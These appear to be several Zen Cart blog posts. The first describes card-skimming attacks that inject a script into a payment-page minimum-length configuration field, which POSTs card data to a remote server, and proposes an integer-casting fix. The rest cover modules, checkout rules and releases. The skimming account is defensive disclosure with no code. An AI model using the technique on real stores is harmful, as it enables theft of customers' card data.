Payment Page Credential Stealing in Zen Cart

I have seen several successful attacks in the last month on Zen Cart which have used the Minimum Values fields. (osCommerce has a similar vulnerability.) The attack works as follows:

  • Inject a script into one of the CC min length fields (in this case, CC_NUMBER_MIN_LENGTH).
  • This script will fire when the payment page is loaded if onsite card number capture is being used.
  • The script does an AJAX POST to a remote server.

Here’s a screenshot of the Admin->Configuration->Minimum Values field:

Zen Cart credit card minimum values hack

A proposed defense against this attack is to cast integer values from the configuration table as integers, thereby ensuring the script does not get echo’ed on the page. You can see my implementation in Zen Cart 1.5.7 Pull Request #2471.

Zen Cart Mod Recommendation – zenNonCAPTCHA

I heartily recommend the mod zenNonCAPTCHA. Instead of the clunky usual CAPTCHA technique of forcing a user to type a string or identify images (which is often quite difficult for older users), zenNonCAPTCHA is done with a slider test. Moving the slider until the value “Human” is shown is how you pass the CAPTCHA test. Here’s a screenshot of how the slider looks when it is first presented:

Zen Cart zenNonCAPTCHA slider start

And here’s how the slider looks when you have successfully moved it to Human:

Zen Cart zenNonCAPTCHA slider start

June 2019 Updates to Zen Cart Mods

I have updated a few modules recently:

Blogs I’m following

Like many people, I got out of the blog habit when Google killed Google Reader, but I recently started using Reader (with Feedbin) so that I could enjoy blogs once again. Here’s what I’m reading these days:

What are you reading?

Using Zen Cart Valid Cart to apply checkout rules

One of my customers wanted to use Valid Cart for Zen Cart to apply the rules shown in the matrix below. If one of the products in the first column was in the cart, the customer also had to buy one of the products in columns 3-6, otherwise they would not be permitted to check out.

This is easily done with Valid Cart, which will block checkout unless the rule is passed. So trying to checkout with just product 489, for example (which is an add-on product) would not be permitted; the customer would need to add product 334, 385, 361 or 397 to the cart.

Zen Cart Order Total Edit

Sometimes you just need to change the line items on an order- increase a discount, reduce a shipping cost, or whatever, to keep a client happy.

You may or may not be able to do this with Edit Orders, but even if you can, this mod removes and replaces the records in the orders_products table, which may not be desirable (if you have additional fields in that table which are set using custom logic, as is the case for dropshippers).

Now you have a new option: Zen Cart Order Total Edit. Hope it helps your business!

Zen Cart 1.5.6b Release Cutoff

The long awaited Zen Cart 1.5.6b Release is scheduled to be initiated on 4/30 (no more changes to Github, file labeling applied), with a zip file created later that week. Here’s the announcement.

1.5.6b promises better interoperability with PHP 7.2+ as well as a number of bug fixes from earlier 1.5.6 releases. The change set from Zen Cart 1.5.6a to the current HEAD is large, containing almost 400 commits!

**WARNING** flashing on tab title in Zen Cart 1.5.6

After the timeout specified in Admin->Configuration->My Store->Admin Session Time Out in Seconds has expired, the tab you are running your Zen Cart Admin in begins to flash **WARNING**.  This is quite a horrible experience – it’s as bad as the old <blink> tag in web pages from the mid 1990s. It’s a blight and a distraction. But the good news is, it’s also really easy to kill!

Edit the file admin/includes/keepalive_module.php

Around line 29, just after


add the line

    'flashTitle' : false,

Refresh your admin, and from then on, no blinking!